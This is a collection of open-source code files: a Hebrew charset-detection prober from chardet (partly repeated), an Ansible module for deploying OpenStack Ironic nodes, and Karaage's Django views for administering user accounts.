# When the Group prober receives a positive identification from any prober,
# it asks for the name of the charset identified. If the prober queried is a
# Hebrew model prober, the model prober forwards the call to the
# HebrewProber to make the final decision. In the HebrewProber, the
# decision is made according to the final-letter scores maintained and both
# model probers' scores. The answer is returned in the form of the name of the
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mLogicalProber = None
self._mVisualProber = None
self.reset()
def reset(self):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
def set_model_probers(self, logicalProber, visualProber):
self._mLogicalProber = logicalProber
self._mVisualProber = visualProber
def is_final(self, c):
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
for cur in aBuf:
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
# If the final letter score distance is dominant enough, rely on it.
finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore
if finalsub >= MIN_FINAL_CHAR_DISTANCE:
return LOGICAL_HEBREW_NAME
if finalsub <= -MIN_FINAL_CHAR_DISTANCE:
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting
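# Wiring sketch (mirrors the SBCSGroupProber arrangement described above; the
# names below are assumptions, not defined in this file): the group prober
# creates the helper and the two Win1255 model probers, then links them:
#
#   hebrew_prober = HebrewProber()
#   logical = SBCharSetProber(Win1255HebrewModel, False, hebrew_prober)
#   visual = SBCharSetProber(Win1255HebrewModel, True, hebrew_prober)
#   hebrew_prober.set_model_probers(logical, visual)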
|
EIngram/GarageDoor
|
refs/heads/master
|
Lambda_Function/requests/packages/chardet/hebrewprober.py
|
2928
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Shy Shalom
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
### General ideas of the Hebrew charset recognition ###
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
# To sum up all of the above, the Hebrew probing mechanism knows about two
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contains special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
#
# The prober is divided between two SBCharSetProbers and a HebrewProber,
# all of which are managed, created, fed data, inquired and deleted by the
# SBCSGroupProber. The two SBCharSetProbers identify that the text is in
# fact some kind of Hebrew, Logical or Visual. The final decision about which
# one it is is made by the HebrewProber by combining final-letter scores
# with the scores of the two SBCharSetProbers to produce a final answer.
#
# The SBCSGroupProber is responsible for stripping the original text of HTML
# tags, English characters, numbers, low-ASCII punctuation characters, spaces
# and new lines. It reduces any sequence of such characters to a single space.
# The buffer fed to each prober in the SBCS group prober is pure text in
# high-ASCII.
# The two SBCharSetProbers (model probers) share the same language model:
# Win1255Model.
# The first SBCharSetProber uses the model normally as any other
# SBCharSetProber does, to recognize windows-1255, upon which this model was
# built. The second SBCharSetProber is told to make the pair-of-letter
# lookup in the language model backwards. This in practice exactly simulates
# a visual Hebrew model using the windows-1255 logical Hebrew model.
#
# The HebrewProber is not using any language model. All it does is look for
# final-letter evidence suggesting the text is either logical Hebrew or visual
# Hebrew. Disjointed from the model probers, the results of the HebrewProber
# alone are meaningless. HebrewProber always returns 0.00 as confidence
# since it never identifies a charset by itself. Instead, the pointer to the
# HebrewProber is passed to the model probers as a helper "Name Prober".
# When the Group prober receives a positive identification from any prober,
# it asks for the name of the charset identified. If the prober queried is a
# Hebrew model prober, the model prober forwards the call to the
# HebrewProber to make the final decision. In the HebrewProber, the
# decision is made according to the final-letter scores maintained and both
# model probers' scores. The answer is returned in the form of the name of the
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mLogicalProber = None
self._mVisualProber = None
self.reset()
def reset(self):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
def set_model_probers(self, logicalProber, visualProber):
self._mLogicalProber = logicalProber
self._mVisualProber = visualProber
def is_final(self, c):
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
for cur in aBuf:
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
# If the final letter score distance is dominant enough, rely on it.
finalsub = self._mFinalCharLogicalScore - self._mFinalCharVisualScore
if finalsub >= MIN_FINAL_CHAR_DISTANCE:
return LOGICAL_HEBREW_NAME
if finalsub <= -MIN_FINAL_CHAR_DISTANCE:
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting
|
kennethgillen/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/openstack/os_ironic_node.py
|
49
|
#!/usr/bin/python
# coding: utf-8 -*-
# (c) 2015, Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_ironic_node
short_description: Activate/Deactivate Bare Metal Resources from OpenStack
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
version_added: "2.0"
description:
- Deploy to nodes controlled by Ironic.
options:
state:
description:
- Indicates desired state of the resource
choices: ['present', 'absent']
default: present
deploy:
description:
- Indicates if the resource should be deployed. Allows for deployment
logic to be disengaged and control of the node power or maintenance
state to be changed.
choices: ['true', 'false']
default: true
uuid:
description:
- globally unique identifier (UUID) to be given to the resource.
required: false
default: None
ironic_url:
description:
- If noauth mode is utilized, this is required to be set to the
endpoint URL for the Ironic API. Use with "auth" and "auth_type"
settings set to None.
required: false
default: None
config_drive:
description:
- A configdrive file or HTTP(S) URL that will be passed along to the
node.
required: false
default: None
instance_info:
description:
- Definition of the instance information which is used to deploy
the node. This information is only required when an instance is
set to present.
suboptions:
image_source:
description:
- An HTTP(S) URL where the image can be retrieved from.
image_checksum:
description:
- The checksum of image_source.
image_disk_format:
description:
- The type of image that has been requested to be deployed.
power:
description:
- A setting to allow power state to be asserted allowing nodes
that are not yet deployed to be powered on, and nodes that
are deployed to be powered off.
choices: ['present', 'absent']
default: present
maintenance:
description:
- A setting to allow the direct control if a node is in
maintenance mode.
required: false
default: false
maintenance_reason:
description:
- A string expression regarding the reason a node is in a
maintenance mode.
required: false
default: None
wait:
description:
- A boolean value instructing the module to wait for node
activation or deactivation to complete before returning.
required: false
default: False
version_added: "2.1"
timeout:
description:
- An integer value representing the number of seconds to
wait for the node activation or deactivation to complete.
version_added: "2.1"
availability_zone:
description:
      - Ignored. Present for backwards compatibility
required: false
'''
EXAMPLES = '''
# Activate a node by booting an image with a configdrive attached
os_ironic_node:
cloud: "openstack"
uuid: "d44666e1-35b3-4f6b-acb0-88ab7052da69"
state: present
power: present
deploy: True
maintenance: False
config_drive: "http://192.168.1.1/host-configdrive.iso"
instance_info:
image_source: "http://192.168.1.1/deploy_image.img"
image_checksum: "356a6b55ecc511a20c33c946c4e678af"
image_disk_format: "qcow"
delegate_to: localhost
'''
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
from distutils.version import StrictVersion
def _choose_id_value(module):
if module.params['uuid']:
return module.params['uuid']
if module.params['name']:
return module.params['name']
return None
# TODO(TheJulia): Change this over to use the machine patch method
# in shade once it is available.
def _prepare_instance_info_patch(instance_info):
patch = []
patch.append({
'op': 'replace',
'path': '/instance_info',
'value': instance_info
})
return patch
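# For example, instance_info={'image_source': 'http://.../img'} yields:
#   [{'op': 'replace', 'path': '/instance_info',
#     'value': {'image_source': 'http://.../img'}}]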
def _is_true(value):
true_values = [True, 'yes', 'Yes', 'True', 'true', 'present', 'on']
if value in true_values:
return True
return False
def _is_false(value):
false_values = [False, None, 'no', 'No', 'False', 'false', 'absent', 'off']
if value in false_values:
return True
return False
def _check_set_maintenance(module, cloud, node):
if _is_true(module.params['maintenance']):
if _is_false(node['maintenance']):
cloud.set_machine_maintenance_state(
node['uuid'],
True,
reason=module.params['maintenance_reason'])
module.exit_json(changed=True, msg="Node has been set into "
"maintenance mode")
else:
# User has requested maintenance state, node is already in the
# desired state, checking to see if the reason has changed.
if (str(node['maintenance_reason']) not in
str(module.params['maintenance_reason'])):
cloud.set_machine_maintenance_state(
node['uuid'],
True,
reason=module.params['maintenance_reason'])
module.exit_json(changed=True, msg="Node maintenance reason "
"updated, cannot take any "
"additional action.")
elif _is_false(module.params['maintenance']):
if node['maintenance'] is True:
cloud.remove_machine_from_maintenance(node['uuid'])
return True
else:
module.fail_json(msg="maintenance parameter was set but a valid "
"the value was not recognized.")
return False
def _check_set_power_state(module, cloud, node):
if 'power on' in str(node['power_state']):
if _is_false(module.params['power']):
# User has requested the node be powered off.
cloud.set_machine_power_off(node['uuid'])
module.exit_json(changed=True, msg="Power requested off")
if 'power off' in str(node['power_state']):
if (_is_false(module.params['power']) and
_is_false(module.params['state'])):
return False
        if (_is_false(module.params['power']) and
                _is_true(module.params['state'])):
            module.exit_json(
                changed=False,
                msg="Power for node is %s, node must be reactivated "
                    "OR set to state absent" % node['power_state']
            )
# In the event the power has been toggled on and
# deployment has been requested, we need to skip this
# step.
if (_is_true(module.params['power']) and
_is_false(module.params['deploy'])):
# Node is powered down when it is not awaiting to be provisioned
cloud.set_machine_power_on(node['uuid'])
return True
# Default False if no action has been taken.
return False
def main():
argument_spec = openstack_full_argument_spec(
uuid=dict(required=False),
name=dict(required=False),
instance_info=dict(type='dict', required=False),
config_drive=dict(required=False),
ironic_url=dict(required=False),
state=dict(required=False, default='present'),
maintenance=dict(required=False),
maintenance_reason=dict(required=False),
power=dict(required=False, default='present'),
deploy=dict(required=False, default=True),
wait=dict(type='bool', required=False, default=False),
timeout=dict(required=False, type='int', default=1800),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
if (module.params['wait'] and
StrictVersion(shade.__version__) < StrictVersion('1.4.0')):
module.fail_json(msg="To utilize wait, the installed version of"
"the shade library MUST be >=1.4.0")
if (module.params['auth_type'] in [None, 'None'] and
module.params['ironic_url'] is None):
module.fail_json(msg="Authentication appears disabled, Please "
"define an ironic_url parameter")
if (module.params['ironic_url'] and
module.params['auth_type'] in [None, 'None']):
module.params['auth'] = dict(
endpoint=module.params['ironic_url']
)
node_id = _choose_id_value(module)
if not node_id:
module.fail_json(msg="A uuid or name value must be defined "
"to use this module.")
try:
cloud = shade.operator_cloud(**module.params)
node = cloud.get_machine(node_id)
if node is None:
module.fail_json(msg="node not found")
uuid = node['uuid']
instance_info = module.params['instance_info']
changed = False
wait = module.params['wait']
timeout = module.params['timeout']
        # User has requested desired state to be in maintenance state.
        if module.params['state'] == 'maintenance':
module.params['maintenance'] = True
if node['provision_state'] in [
'cleaning',
'deleting',
'wait call-back']:
module.fail_json(msg="Node is in %s state, cannot act upon the "
"request as the node is in a transition "
"state" % node['provision_state'])
# TODO(TheJulia) This is in-development code, that requires
# code in the shade library that is still in development.
if _check_set_maintenance(module, cloud, node):
            if node['provision_state'] == 'active':
module.exit_json(changed=True,
result="Maintenance state changed")
changed = True
node = cloud.get_machine(node_id)
if _check_set_power_state(module, cloud, node):
changed = True
node = cloud.get_machine(node_id)
if _is_true(module.params['state']):
if _is_false(module.params['deploy']):
module.exit_json(
changed=changed,
result="User request has explicitly disabled "
"deployment logic"
)
if 'active' in node['provision_state']:
module.exit_json(
changed=changed,
result="Node already in an active state."
)
if instance_info is None:
module.fail_json(
changed=changed,
msg="When setting an instance to present, "
"instance_info is a required variable.")
# TODO(TheJulia): Update instance info, however info is
# deployment specific. Perhaps consider adding rebuild
# support, although there is a known desire to remove
# rebuild support from Ironic at some point in the future.
patch = _prepare_instance_info_patch(instance_info)
cloud.set_node_instance_info(uuid, patch)
cloud.validate_node(uuid)
if not wait:
cloud.activate_node(uuid, module.params['config_drive'])
else:
cloud.activate_node(
uuid,
configdrive=module.params['config_drive'],
wait=wait,
timeout=timeout)
# TODO(TheJulia): Add more error checking..
module.exit_json(changed=changed, result="node activated")
elif _is_false(module.params['state']):
if node['provision_state'] not in "deleted":
cloud.purge_node_instance_info(uuid)
if not wait:
cloud.deactivate_node(uuid)
else:
cloud.deactivate_node(
uuid,
wait=wait,
timeout=timeout)
module.exit_json(changed=True, result="deleted")
else:
module.exit_json(changed=False, result="node not found")
else:
module.fail_json(msg="State must be present, absent, "
"maintenance, off")
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == "__main__":
main()
|
Karaage-Cluster/karaage
|
refs/heads/master
|
karaage/people/views/persons.py
|
2
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage. If not, see <http://www.gnu.org/licenses/>.
import datetime
import django_tables2 as tables
import six
from django.contrib import messages
from django.contrib.auth import views
from django.http import (
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseRedirect,
QueryDict,
)
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views.decorators.debug import sensitive_post_parameters
import karaage.common as common
from karaage.common.decorators import admin_required, login_required
from karaage.institutes.tables import InstituteTable
from karaage.people.emails import (
send_bounced_warning,
send_reset_password_email,
)
from karaage.people.forms import (
AddPersonForm,
AdminPasswordChangeForm,
AdminPersonForm,
SetPasswordForm,
)
from karaage.people.models import Person
from karaage.people.tables import LeaderTable, PersonFilter, PersonTable
from karaage.projects.models import Project
from karaage.projects.tables import ProjectTable
def _add_edit_user(request, form_class, username):
person_form = form_class
if username is None:
person = None
else:
person = get_object_or_404(Person, username=username)
form = person_form(request.POST or None, instance=person)
if request.method == 'POST':
if form.is_valid():
if person:
# edit
person = form.save()
messages.success(
request, "User '%s' was edited succesfully" % person)
assert person is not None
else:
# add
person = form.save()
messages.success(
request, "User '%s' was created succesfully" % person)
assert person is not None
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_form.html',
context={'person': person, 'form': form},
request=request)
@sensitive_post_parameters('password1', 'password2')
@admin_required
def add_user(request):
return _add_edit_user(request, AddPersonForm, None)
@admin_required
def edit_user(request, username):
return _add_edit_user(request, AdminPersonForm, username)
@login_required
def user_list(request, queryset=None, title=None):
if queryset is None:
queryset = Person.objects.all()
if not common.is_admin(request):
queryset = queryset.filter(pk=request.user.pk)
queryset = queryset.select_related()
q_filter = PersonFilter(request.GET, queryset=queryset)
table = PersonTable(q_filter.qs)
tables.RequestConfig(request).configure(table)
spec = []
for name, value in six.iteritems(q_filter.form.cleaned_data):
if value is not None and value != "":
name = name.replace('_', ' ').capitalize()
spec.append((name, value))
context = {
'table': table,
'filter': q_filter,
'spec': spec,
'title': title or "Person list",
}
return render(
template_name="karaage/people/person_list.html", context=context,
request=request)
@admin_required
def locked_list(request):
result = QueryDict("", mutable=True)
result['active'] = "locked"
url = reverse('kg_person_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
@admin_required
def struggling(request):
today = datetime.date.today()
days30 = today - datetime.timedelta(days=30)
result = QueryDict("", mutable=True)
result['active'] = "yes"
result['begin_date_approved'] = days30
result['no_last_usage'] = True
result['sort'] = "-date_approved"
url = reverse('kg_person_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
@admin_required
def delete_user(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
deleted_by = request.user
person.deactivate(deleted_by)
messages.success(request, "User '%s' was deleted succesfully" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_delete.html',
context=locals(),
request=request)
@login_required
def user_detail(request, username):
config = tables.RequestConfig(request, paginate={"per_page": 5})
person = get_object_or_404(Person, username=username)
if not person.can_view(request):
return HttpResponseForbidden(
'<h1>Access Denied</h1>'
'<p>You do not have permission to view details '
'about this person.</p>')
leader_project_list = Project.objects.filter(
leaders=person, is_active=True)
leader_project_list = ProjectTable(
leader_project_list, prefix="leader-")
config.configure(leader_project_list)
delegate_institute_list = person.delegate_for.all()
delegate_institute_list = delegate_institute_list.select_related()
delegate_institute_list = InstituteTable(
        delegate_institute_list, prefix="delegate-")
config.configure(delegate_institute_list)
return render(
template_name='karaage/people/person_detail.html', context=locals(),
request=request)
@admin_required
def user_verbose(request, username):
person = get_object_or_404(Person, username=username)
from karaage.datastores import get_account_details
account_details = {}
for ua in person.account_set.filter(date_deleted__isnull=True):
details = get_account_details(ua)
account_details[ua] = details
return render(
template_name='karaage/people/person_verbose.html', context=locals(),
request=request)
@admin_required
def activate(request, username):
person = get_object_or_404(Person, username=username)
if person.is_active:
return HttpResponseBadRequest("<h1>Bad Request</h1>")
if request.method == 'POST':
approved_by = request.user
person.activate(approved_by)
return HttpResponseRedirect(
reverse('kg_person_password', args=[person.username]))
return render(
template_name='karaage/people/person_reactivate.html',
context={'person': person},
request=request)
@sensitive_post_parameters('new1', 'new2')
@admin_required
def password_change(request, username):
person = get_object_or_404(Person, username=username)
if request.POST:
form = AdminPasswordChangeForm(data=request.POST, person=person)
if form.is_valid():
form.save()
messages.success(request, "Password changed successfully")
if person.is_locked():
person.unlock()
return HttpResponseRedirect(person.get_absolute_url())
else:
form = AdminPasswordChangeForm(person=person)
return render(
template_name='karaage/people/person_password.html',
context={'person': person, 'form': form},
request=request)
@admin_required
def lock_person(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
person.lock()
messages.success(request, "%s's account has been locked" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_lock.html',
context=locals(),
request=request)
@admin_required
def unlock_person(request, username):
person = get_object_or_404(Person, username=username)
if request.method == 'POST':
person.unlock()
messages.success(request, "%s's account has been unlocked" % person)
return HttpResponseRedirect(person.get_absolute_url())
return render(
template_name='karaage/people/person_confirm_unlock.html',
context=locals(),
request=request)
@admin_required
def bounced_email(request, username):
person = get_object_or_404(Person, username=username)
leader_list = []
for project in person.projects.filter(is_active=True):
for leader in project.leaders.filter(
is_active=True, login_enabled=True):
leader_list.append({'project': project, 'leader': leader})
if request.method == 'POST':
person.lock()
send_bounced_warning(person, leader_list)
messages.success(
request,
"%s's account has been locked and emails have been sent" % person)
common.log.change(
person,
'Emails sent to project leaders and account locked')
return HttpResponseRedirect(person.get_absolute_url())
